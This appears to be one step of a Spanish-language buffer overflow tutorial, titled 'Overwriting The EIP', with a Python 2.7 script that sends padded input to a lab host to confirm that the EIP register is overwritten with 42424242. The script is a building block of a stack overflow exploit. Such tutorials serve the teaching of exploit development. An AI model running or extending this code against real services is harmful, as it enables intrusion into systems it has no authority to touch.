Overwriting The EIP

Este paso es para validar que el EIP tenga el valor indicado posteriormente:

#!/usr/bin/python2.7
import sys, socket

shellcode = "A" * VALOR_DEL_OFFSET + "B" * 4 #(valor del paso anterior)

while True:
        try:
                s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                s.connect(('10.10.10.111',3000))

                s.send(('FUNCION /.:/' + shellcode))
                s.close()

        except:
                print "Error connecting to server"
                sys.exit()

Resultado en EIP debe ser 42424242

AnteriorFinding the Offset SiguienteFinding the Bad Charaters

Última actualización hace 7 meses